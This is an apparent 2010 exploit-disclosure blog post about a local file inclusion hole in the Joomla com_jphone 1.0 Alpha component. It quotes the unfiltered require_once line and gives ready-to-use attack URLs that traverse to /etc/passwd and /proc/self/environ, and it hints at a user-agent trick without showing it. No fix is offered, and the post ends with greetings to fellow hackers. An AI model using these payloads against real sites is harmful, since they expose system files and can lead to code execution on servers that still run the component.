Friday, September 10, 2010

Joomla Component (com_jphone) Local File Inclusion Vulnerability

0
in

- Discovered by : Chip D3 Bi0s
- Date : 2010-09-10
- Where : From Remote

DESCRIPTION
Some Local File inclusion vulnerabilities exist in Component Joomla Jphone 1.0 Alpha

ANALYSIS

The bug is in the following files, specifying the lines

/components/com_jphone/jphone.php

[63] if($controller = JRequest::getVar('controller')) {
[64]
[65] require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');

Explanation:As noted in the line [65] $controller
nowhere is filtered, which result is lfi as is known to pass '.php' use :)

EXPLOITATION

http://site/path/index.php?option=com_jphone&controller={LFI}
{LFI}=../../../../../../../../../../etc/passwd
{LFI}=../../../../../../../../../../proc/self/environ

changing the user agent for something so:


A special greeting to my good friends:
F3l0m4n, R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita :)

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting